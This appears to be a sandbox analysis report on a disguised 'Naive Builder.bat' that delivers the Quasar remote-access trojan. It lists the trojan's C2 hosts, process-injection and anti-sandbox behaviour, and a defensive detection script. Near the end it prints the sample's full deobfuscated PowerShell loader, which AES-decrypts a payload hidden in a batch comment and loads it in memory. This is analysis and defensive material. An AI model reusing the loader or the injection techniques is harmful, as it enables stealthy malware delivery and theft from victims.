Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system -
submitted
04-12-2024 09:39
Static task
static1
Behavioral task
behavioral1
Sample
naive-stealer-main/Naive Builder.bat
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
naive-stealer-main/Naive Builder.bat
Resource
win10v2004-20241007-en
General
-
Target
naive-stealer-main/Naive Builder.bat
-
Size
12.8MB
-
MD5
a2e3e4286e8b22b3b021a6706b899dd7
-
SHA1
e6179204735421c3927f27c13f9751af1dce9bd2
-
SHA256
efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
-
SHA512
3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
-
SSDEEP
49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Malware Config
Extracted
  Family             quasar
  Version            1.0.0.0
  Botnet / tag       v15.6.3 | xen
  C2                 studies-royal.at.ply.gg:31849
                     usa-departments.at.ply.gg:37274
                     category-in.at.ply.gg:42204
  Mutex              bd62476d-8a2b-4e05-a8e5-68cc94baac4f
  encryption_key     AA41DD5506DCFCA6EE3BF934CC3C9319F80E5E10
  install_name       .exe
  log_directory      $sxr-Logs
  reconnect_delay    5000
  startup_key        $sxr-seroxen
(The labels Family, Version, Botnet / tag, C2 and Mutex are not in the extracted page; they are assigned here from the order in which the Quasar config extractor emits these fields, so treat them as an editor's reading. All three C2 endpoints are *.at.ply.gg hostnames, i.e. playit.gg tunnel endpoints: the operator's real address sits behind the tunnel service and the resolved IPs belong to playit.gg, so pivot and block on the hostnames and the ply.gg pattern rather than on an IP. The $sxr- prefix of log_directory and startup_key recurs in the dropped file names further down.)
Signatures
-
Quasar family
-
Quasar payload  1 IoCs
  resource                                                                      yara_rule
  behavioral2/memory/820-60-0x0000023A7DBF0000-0x0000023A7E3AC000-memory.dmp     family_quasar
  (The match is a memory dump of PID 820, the dropped $sxr-powershell.exe. No clear-text copy of the Quasar client appears among the dropped files: it is AES-decrypted, gunzipped and loaded in-process by the command lines shown in the process tree.)
Suspicious use of NtCreateUserProcessOtherParentProcess  5 IoCs
  description           pid    Process                  procid_target
  PID 1748 created 616  1748   Naive Builder.bat.exe    5
  PID 820 created 616   820    $sxr-powershell.exe      5
  PID 820 created 616   820    $sxr-powershell.exe      5
  PID 1748 created 616  1748   Naive Builder.bat.exe    5
  PID 1748 created 616  1748   Naive Builder.bat.exe    5
  (Parent-PID spoofing: each row is a child created with PID 616, winlogon.exe, declared as its parent; procid_target is the report's internal process index, not a PID. The five children are the dllhost.exe surrogates that appear under winlogon.exe in the process tree, and the same five PIDs are the SetThreadContext targets below.)
Checks BIOS information in registry  2 TTPs  2 IoCs
BIOS information is often read in order to detect sandboxing environments.
  description         ioc                                                               Process
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate      wmiprvse.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   wmiprvse.exe
  (The reads are performed by wmiprvse.exe, so the sample is querying WMI rather than touching the registry itself. wmiprvse.exe is not in the process tree, so the WMI client cannot be tied to a PID from this report; the same applies to the SCSI and system-info entries below.)
Checks computer location settings  2 TTPs  1 IoCs
Looks up country code configured in the registry, likely geofence.
  description         ioc                                                                                                        Process
  Key value queried   \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation      Naive Builder.bat.exe
  (Caveat: PID 1748 is a PowerShell host, and .NET's culture/region initialisation reads Geo\Nation on its own, so this single read is weak evidence of a geofence by itself.)
Deletes itself  1 IoCs
  pid    Process
  1748   Naive Builder.bat.exe
-
Executes dropped EXE  3 IoCs
  pid    Process
  1748   Naive Builder.bat.exe
  820    $sxr-powershell.exe
  4136   $sxr-powershell.exe
-
Hide Artifacts: Hidden Window  1 TTPs  2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
  pid    Process
  820    $sxr-powershell.exe
  4136   $sxr-powershell.exe
Drops file in System32 directory  17 IoCs
  Naive Builder.bat.exe, File created and File opened for modification:
    C:\Windows\System32\vcruntime140d.dll
    C:\Windows\System32\ucrtbased.dll
    C:\Windows\System32\vcruntime140_1d.dll
  $sxr-powershell.exe, File opened for modification:
    C:\Windows\System32\vcruntime140d.dll
    C:\Windows\System32\ucrtbased.dll
    C:\Windows\System32\vcruntime140_1d.dll
  svchost.exe (the CryptSvc host, PID 2700 in the process tree), File opened for modification:
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
    C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
  OfficeClickToRun.exe, File opened for modification:
    C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml
  (Only the first two groups are the sample's doing. The three DLLs are the debug builds of the MSVC and UCRT runtimes, which Microsoft does not redistribute and which are not normally present on end-user machines, so their appearance in System32 is a usable file indicator. The CryptnetUrlCache and Office entries are certificate-cache and Office telemetry writes by system services.)
Suspicious use of SetThreadContext  5 IoCs
  description                             pid    Process                  procid_target
  PID 1748 set thread context of 5012     1748   Naive Builder.bat.exe    91
  PID 820 set thread context of 632       820    $sxr-powershell.exe      95
  PID 820 set thread context of 1772      820    $sxr-powershell.exe      97
  PID 1748 set thread context of 220      1748   Naive Builder.bat.exe    100
  PID 1748 set thread context of 1084     1748   Naive Builder.bat.exe    101
  (All five targets are the freshly created dllhost.exe /Processid:{...} surrogates in the process tree, i.e. the classic hollowing sequence: create suspended with a spoofed parent, write, set thread context, resume.)
-
Drops file in Windows directory  6 IoCs
  description                     ioc                                            Process
  File created                    C:\Windows\$sxr-mshta.exe                      Naive Builder.bat.exe
  File opened for modification    C:\Windows\$sxr-mshta.exe                      Naive Builder.bat.exe
  File created                    C:\Windows\$sxr-seroxen2\$sxr-Uni.bat          cmd.exe
  File opened for modification    C:\Windows\$sxr-seroxen2\$sxr-Uni.bat          cmd.exe
  File created                    C:\Windows\$sxr-powershell.exe                 Naive Builder.bat.exe
  File opened for modification    C:\Windows\$sxr-powershell.exe                 Naive Builder.bat.exe
  (The names mimic mshta.exe and powershell.exe with the same $sxr- prefix as the Quasar config's log_directory and startup_key; $sxr-powershell.exe is the host that the second-stage command line runs in.)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery  1 TTPs  2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
  pid    Process
  2444   cmd.exe
  4692   PING.EXE
Checks SCSI registry key(s)  3 TTPs  18 IoCs
SCSI information is often read in order to detect sandboxing environments.
  All 18 reads are by wmiprvse.exe under \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\:
  Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000
    Key opened          the device key itself, LogConf
    Key value queried   FriendlyName, ConfigFlags, CompatibleIDs, Mfg, Service, DeviceDesc, HardwareID
  CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000
    Key opened          the device key itself, LogConf
    Key value queried   HardwareID, DeviceDesc, Service, CompatibleIDs, FriendlyName, Mfg, ConfigFlags
  (The disk carries a real WDC model string, but the optical drive's vendor and product are QEMU, which gives the hypervisor away to any check that looks at it. The sample still reached the Quasar stage, so either no such check is made or it did not abort.)
-
Enumerates system info in registry  2 TTPs  1 IoCs
  description         ioc                                                        Process
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier   wmiprvse.exe
Kills process with taskkill  1 IoCs
  pid    Process
  3240   taskkill.exe
-
Modifies data under HKEY_USERS  14 IoCs
  OfficeClickToRun.exe (13 entries):
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
    Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor
    Key deleted       \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR
    Key deleted       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
    Set value (str)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"
    Set value (str)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"
    Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733305293"
    Set value (str)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:41:35 GMT"
    Set value (str)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27D6FD15-D07D-4FBB-BD69-05A5882CAEDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"
  svchost.exe (1 entry):
    Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  (None of these is attributable to the sample: they are Office Click-to-Run telemetry rule updates and a service host's WinINet connection key, i.e. sandbox background activity that happens to touch HKEY_USERS.)
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses  64 IoCs
  pid    Process
  1748   Naive Builder.bat.exe
  5012   dllhost.exe
  820    $sxr-powershell.exe
  632    dllhost.exe
  4136   $sxr-powershell.exe
  1772   dllhost.exe
  (64 entries across these six processes; the bulk are PID 1772, the surrogate that goes on to write into other processes under WriteProcessMemory below. Three signatures in this report stop at exactly 64 entries, so the true counts are likely higher.)
-
Suspicious use of AdjustPrivilegeToken  64 IoCs
  Token                 pid    Process
  SeDebugPrivilege      1748   Naive Builder.bat.exe
  SeDebugPrivilege      5012   dllhost.exe
  SeDebugPrivilege      820    $sxr-powershell.exe
  SeDebugPrivilege      632    dllhost.exe
  SeDebugPrivilege      4136   $sxr-powershell.exe
  SeDebugPrivilege      1772   dllhost.exe
  SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege (the same twelve, enabled as a set several times)   2056   svchost.exe
  SeAuditPrivilege      2760   svchost.exe
  (SeDebugPrivilege in the sample's own processes is what the cross-process writes below require. PIDs 2056 and 2760 are the Winmgmt and LanmanServer service hosts in the process tree adjusting their own tokens, consistent with the WMI service spinning up the wmiprvse.exe provider host that performs the BIOS and SCSI queries above rather than with an action of the sample.)
Suspicious use of SetWindowsHookEx  2 IoCs
  pid    Process
  820    $sxr-powershell.exe
  3484   Conhost.exe
-
Suspicious use of WriteProcessMemory  64 IoCs
  writer pid   writer Process           target pid   procid_target   entries
  1484         cmd.exe                  5008         83              2
  5008         net.exe                  5096         84              2
  1484         cmd.exe                  1748         85              2
  1748         Naive Builder.bat.exe    5012         91              7
  1748         Naive Builder.bat.exe    820          94              2
  820          $sxr-powershell.exe      632          95              7
  820          $sxr-powershell.exe      4136         96              2
  820          $sxr-powershell.exe      1772         97              9
  1772         dllhost.exe              616, 676, 964, 380, 408, 64, 1096, 1124, 1172, 1224, 1304, 1320, 1336, 1400, 1488, 1592, 1600, 1660, 1736, 1756, 1792, 1888, 1996, 2008, 1520, 1668, 2056, 2116, 2224, 2352, 2512   5 to 42   31, one per target
  (The 2-entry rows are ordinary process creation by a parent. The 7- and 9-entry rows are the hollowing writes into the dllhost.exe surrogates, matching SetThreadContext above. The last row is the injected surrogate PID 1772 writing into winlogon.exe (616), lsass.exe (676), dwm.exe (380), spoolsv.exe (2116) and most of the svchost.exe service hosts in the tree, within the 150 s the sandbox ran; the listing stops at 64 entries, so the real spread is likely wider.)
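The parent-spoofing, drop-path and inline-loader behaviours recorded above are easy to express as a triage filter. What follows is an added example, not part of this report or of the sample: a PowerShell function that takes process-creation records using Sysmon Event ID 1 field names (Image, CommandLine, ParentImage, ProcessId) and returns findings. The sample records are constructed from the PIDs, paths and command-line fragments in the process tree, with one benign control added (its CLSID is a placeholder); the rule that flags dllhost.exe surrogates relies on the fact that the DcomLaunch service host, not winlogon.exe, is their legitimate creator.

```powershell
# Added example, not from the report or the sample: a triage filter for the process-creation
# pattern this report shows. Input records use Sysmon Event ID 1 field names (Image,
# CommandLine, ParentImage, ProcessId); the sample records below are constructed from the
# PIDs, paths and command-line fragments in the process tree, plus one benign control.
function Get-SxrFindings {
    param([Parameter(Mandatory)][object[]]$Events)
    $findings = @(foreach ($e in $Events) {
        $img    = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $parent = [System.IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()

        # 1. COM surrogate with an unexpected parent. dllhost.exe /Processid:{...} is normally
        #    started by the DcomLaunch svchost; with the parent spoofed to PID 616 the surrogates
        #    in this report show up under winlogon.exe, and Sysmon records that spoofed parent.
        if ($img -eq 'dllhost.exe' -and $e.CommandLine -match '/Processid:\{' -and $parent -ne 'svchost.exe') {
            [pscustomobject]@{ Rule = 'dllhost-surrogate-odd-parent'; Pid = $e.ProcessId; Detail = "parent=$parent" }
        }
        # 2. Anything executing from the C:\Windows\$sxr-* drop locations.
        if ($e.Image -match '(?i)\\Windows\\\$sxr-') {
            [pscustomobject]@{ Rule = 'sxr-drop-path'; Pid = $e.ProcessId; Detail = $e.Image }
        }
        # 3. PowerShell switch set plus the inline AES/GZip/Assembly.Load chain, whatever the
        #    host binary is called (the stage-1 host here is "Naive Builder.bat.exe").
        if ($e.CommandLine -match '(?i)-(ep|executionpolicy)\s+bypass' -and
            $e.CommandLine -match '(?i)Reflection\.Assembly|GZipStream|Cryptography\.Aes') {
            [pscustomobject]@{ Rule = 'inline-assembly-loader'; Pid = $e.ProcessId; Detail = $img }
        }
    })
    return ,$findings
}

# Constructed records (command lines abbreviated to the fragments the rules look at).
$sampleEvents = @(
    [pscustomobject]@{ ProcessId = 1484; Image = 'C:\Windows\system32\cmd.exe'; ParentImage = 'C:\Windows\Explorer.EXE'
                       CommandLine = 'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"' }
    [pscustomobject]@{ ProcessId = 1748; Image = 'C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe'; ParentImage = 'C:\Windows\system32\cmd.exe'
                       CommandLine = '"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); ...' }
    [pscustomobject]@{ ProcessId = 1772; Image = 'C:\Windows\System32\dllhost.exe'; ParentImage = 'C:\Windows\system32\winlogon.exe'
                       CommandLine = 'C:\Windows\System32\dllhost.exe /Processid:{67c2b3fb-ad65-45a3-b121-e1de3f97a420}' }
    [pscustomobject]@{ ProcessId = 820; Image = 'C:\Windows\$sxr-powershell.exe'; ParentImage = 'C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe'
                       CommandLine = '"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command ... [System.Reflection.Assembly]::Load([byte[]]$hcWdd) ...' }
    # benign control: a surrogate started by the DcomLaunch service host (placeholder CLSID)
    [pscustomobject]@{ ProcessId = 4242; Image = 'C:\Windows\System32\dllhost.exe'; ParentImage = 'C:\Windows\system32\svchost.exe'
                       CommandLine = 'C:\Windows\System32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}' }
)

Get-SxrFindings $sampleEvents | Format-Table -AutoSize
```

Against the constructed records the filter returns findings for PIDs 1772, 1748 and 820 and nothing for the cmd.exe launcher or the benign surrogate. Rule 1 is the one worth keeping in production: it is cheap, independent of file names, and the spoofed parent is exactly what process-creation telemetry records, so the evasion becomes the detection.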
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
(Indentation follows the depth markers in the report. The depth-1 entries are the sandbox's own system processes; the sample's chain is Explorer.EXE > cmd.exe (PID 1484) > Naive Builder.bat.exe (PID 1748) > $sxr-powershell.exe. The five dllhost.exe COM surrogates listed under winlogon.exe are the spoofed-parent children of PIDs 1748 and 820, see NtCreateUserProcessOtherParentProcess and SetThreadContext above; a legitimate dllhost.exe /Processid:{...} is started by the DcomLaunch service host, not by winlogon.exe.)

C:\Windows\system32\winlogon.exe   cmd: winlogon.exe   PID 616
    C:\Windows\system32\dwm.exe   cmd: "dwm.exe"   PID 380
    C:\Windows\System32\dllhost.exe   cmd: C:\Windows\System32\dllhost.exe /Processid:{ae3c686e-c8a7-4fc7-8f6a-4b855571a64b}   PID 5012
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe   cmd: C:\Windows\System32\dllhost.exe /Processid:{db6e0d38-00ac-468d-a543-5d6082745848}   PID 632
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe   cmd: C:\Windows\System32\dllhost.exe /Processid:{67c2b3fb-ad65-45a3-b121-e1de3f97a420}   PID 1772
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
    C:\Windows\System32\dllhost.exe   cmd: C:\Windows\System32\dllhost.exe /Processid:{fb6e48e1-68d7-4424-9d35-85cdb984541f}   PID 220
    C:\Windows\System32\dllhost.exe   cmd: C:\Windows\System32\dllhost.exe /Processid:{a7f58d20-342f-4a95-aeb6-4a0482330ff3}   PID 1084
C:\Windows\system32\lsass.exe   cmd: C:\Windows\system32\lsass.exe   PID 676
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM   PID 964
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc   PID 408
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts   PID 64
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService   PID 1096
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc   PID 1124
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule   PID 1172
    C:\Windows\system32\taskhostw.exe   cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}   PID 2920
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog   PID 1224
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc   PID 1304
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc   PID 1320
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi   PID 1336
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp   PID 1400
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager   PID 1488
    C:\Windows\system32\sihost.exe   cmd: sihost.exe   PID 2664
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem   PID 1592
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes   PID 1600
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc   PID 1660
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm   PID 1736
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS   PID 1756
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder   PID 1792
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p   PID 1888
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache   PID 1996
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p   PID 2008
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository   PID 1520
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection   PID 1668
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt   PID 2056
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\spoolsv.exe   cmd: C:\Windows\System32\spoolsv.exe   PID 2116
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation   PID 2224
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc   PID 2352
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent   PID 2512
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT   PID 2520
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc   PID 2672
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc   PID 2700
    - Drops file in System32 directory
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer   PID 2760
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\sysmon.exe   cmd: C:\Windows\sysmon.exe   PID 2780
C:\Windows\System32\svchost.exe   cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks   PID 2808
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService   PID 2816
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker   PID 3064
C:\Windows\system32\wbem\unsecapp.exe   cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding   PID 2900
C:\Windows\system32\svchost.exe   cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc   PID 3348
C:\Windows\Explorer.EXE   cmd: C:\Windows\Explorer.EXE   PID 3448
    C:\Windows\system32\cmd.exe   cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"   PID 1484
        - Drops file in Windows directory
        - Suspicious use of WriteProcessMemory
        C:\Windows\System32\Conhost.exe   cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1   PID 2140
        C:\Windows\system32\net.exe   cmd: net session   PID 5008
            - Suspicious use of WriteProcessMemory
            (net session is the usual batch-file elevation check: it succeeds only from an elevated shell.)
            C:\Windows\system32\net1.exe   cmd: C:\Windows\system32\net1 session   PID 5096
        C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe   PID 1748
            (A dropped executable beside the .bat that takes powershell.exe's switches, i.e. evidently a renamed PowerShell host. The command line is reflowed here one statement per line; the reversed-string tricks that hide method names are resolved in the # comments.)
            "Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command
            # mJkVt: AES-CBC/PKCS7 decrypt with a hard-coded 32-byte key (AES-256) and 16-byte IV.
            # 'gnirtS46esaBmorF'[-1..-16] -join ''  resolves to  FromBase64String
            function mJkVt($luVLu){
                $XURkq=[System.Security.Cryptography.Aes]::Create();
                $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC;
                $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
                $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA=');
                $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg==');
                $XhpAT=$XURkq.CreateDecryptor();
                $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length);
                $XhpAT.Dispose(); $XURkq.Dispose();
                $return_var;
            }
            # hLEOv: gunzip a byte array.
            function hLEOv($luVLu){
                $SBbXV=New-Object System.IO.MemoryStream(,$luVLu);
                $RlXKT=New-Object System.IO.MemoryStream;
                $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress);
                $XPinw.CopyTo($RlXKT);
                $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose();
                $RlXKT.ToArray();
            }
            # tzqfR: load the bytes as a .NET assembly inside this process and call its entry point.
            # 'daoL'[-1..-4] -join ''  resolves to  Load
            function tzqfR($luVLu,$MCcIJ){
                $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu);
                $cUkGe=$VEHZu.EntryPoint;
                $cUkGe.Invoke($null, $MCcIJ);
            }
            # Carrier: re-read the .bat itself ('txeTllAdaeR'[-1..-11] resolves to ReadAllText), take the first line that
            # starts with ':: ' (a batch comment, so cmd.exe skips it), drop its first four characters and split the rest on '\'.
            $flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);
            foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}
            $YrvSK=[string[]]$TRCCB.Split('\');
            # Each half: base64 -> AES -> gunzip -> assembly. Half [1] is run first, then half [0], both with the same three string arguments.
            $xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));
            $vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));
            tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            - Suspicious use of NtCreateUserProcessOtherParentProcess
